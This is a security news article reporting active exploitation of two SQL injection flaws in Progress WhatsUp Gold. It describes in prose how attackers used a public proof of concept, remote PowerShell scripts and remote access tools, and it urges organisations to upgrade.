HQ/EMEAFind out how we can help your business
Threat actors have been abusing the publicly exposed vulnerabilities to target a couple of flaws in Progress Software’s WhatsUp Gold network availability and performance monitoring service.
The two bugs exploited in attacks since August 30 are SQL injection flaws known as CVE-2024-6670 and CVE-2024-6671. These vulnerabilities could provide attackers with unauthenticated access to encrypted credentials.
Despite the vendor addressing the security concerns over two weeks ago, many firms that employ the software still need to upgrade to its latest version since threat actors are taking advantage of outdated versions.
On the other hand, a technical write-up shows how to exploit a flawed sanitisation fault in user inputs to introduce arbitrary passwords into administrator account password fields, rendering them susceptible to takeover attacks.
The WhatsUp Gold exploit allegedly came from a proof-of-concept that threat actors immediately adopted and employed in their campaigns.
According to investigations, the hackers started exploiting the WhatsUp Gold vulnerabilities after the attack, which appears to have been based on a particular Proof-of-Concept (PoC) for bypassing authentication.
The attackers also used the exploit to acquire remote code execution and payload deployment stages. One researcher’s telemetry also detected the first signals of active exploitation five hours after the researcher published the proof-of-concept exploit code.
The attackers use WhatsUp Gold’s genuine Active Monitor PowerShell Script feature to execute numerous PowerShell scripts from remote URLs via NmPoller.exe.
Subsequently, the attackers leverage the legitimate Windows utility ’msiexec.exe’ to install several remote access trojans (RATs) through the MSI packages, such as Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote.
Deploying these RATs enables attackers to establish persistence on compromised systems. However, the researchers discovered that the attackers sometimes deploy multiple payloads.
As of now, the research attempt on the ongoing exploit was unable to trace these attacks to specific or known threat organisations. However, using several remote access trojans suggests that a ransomware group may have been the culprit of the attacks.
Organisations currently employing the exploited software should be wary of this threat as they are susceptible to malicious attacks.
